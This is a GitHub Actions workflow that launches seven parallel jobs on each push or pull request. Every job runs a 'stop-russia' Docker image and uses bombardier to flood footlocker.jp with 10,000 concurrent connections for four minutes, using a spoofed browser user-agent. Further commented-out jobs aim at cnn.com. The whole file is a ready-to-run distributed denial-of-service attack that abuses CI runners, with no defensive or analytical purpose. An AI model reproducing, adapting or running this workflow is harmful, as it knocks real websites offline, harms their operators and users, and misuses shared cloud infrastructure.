# UA
# "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
#Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
# clone version
# 10 instances
name: Run Docker Command

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

jobs:
  run-docker-command-1:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 1
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: abagayev/stop-russia:latest
            run: | 
                  export url="https://www.footlocker.jp"
                  bombardier -c 10000 -d 240s -l -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" $url

  run-docker-command-2:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 2
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: abagayev/stop-russia:latest
            run: |
                  export url="https://www.footlocker.jp"
                  bombardier -c 10000 -d 240s -l -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" $url

  run-docker-command-3:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 3
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: abagayev/stop-russia:latest
            run: |
                  export url="https://www.footlocker.jp"
                  bombardier -c 10000 -d 240s -l -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" $url
  run-docker-command-4:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 4
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: abagayev/stop-russia:latest
            run: |
                  export url="https://www.footlocker.jp"
                  bombardier -c 10000 -d 240s -l -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" $url
  run-docker-command-5:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 5
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: abagayev/stop-russia:latest
            run: |
                  export url="https://www.footlocker.jp"
                  bombardier -c 10000 -d 240s -l -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" $url

  run-docker-command-6:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 6
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: abagayev/stop-russia:latest
            run: |
                  export url="https://www.footlocker.jp"
                  bombardier -c 10000 -d 240s -l -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" $url

  run-docker-command-7:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 7
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: abagayev/stop-russia:latest
            run: |
                  export url="https://www.footlocker.jp"
                  bombardier -c 10000 -d 240s -l -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" $url

  # run-docker-command-8:
  #   runs-on: ubuntu-latest

  #   steps:
  #     - name: Instance 8
  #       uses: actions/checkout@v3

  #     - name: Run Docker container inside the action docker
  #       uses: addnab/docker-run-action@v3
  #       with:
  #           image: abagayev/stop-russia:latest
  #           run: |
  #                 export url="https://www.cnn.com"
  #                 bombardier -c 10000 -d 240s -l -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" $url

  # run-docker-command-9:
  #   runs-on: ubuntu-latest

  #   steps:
  #     - name: Instance 9
  #       uses: actions/checkout@v3

  #     - name: Run Docker container inside the action docker
  #       uses: addnab/docker-run-action@v3
  #       with:
  #           image: abagayev/stop-russia:latest
  #           run: |
  #                 export url="https://www.cnn.com"
  #                 bombardier -c 10000 -d 240s -l -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" $url

  # run-docker-command-10:
  #   runs-on: ubuntu-latest

  #   steps:
  #     - name: Instance 10
  #       uses: actions/checkout@v3

  #     - name: Run Docker container inside the action docker
  #       uses: addnab/docker-run-action@v3
  #       with:
  #           image: abagayev/stop-russia:latest
  #           run: |
  #                 export url="https://www.cnn.com"
  #                 bombardier -c 10000 -d 240s -l -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" $url
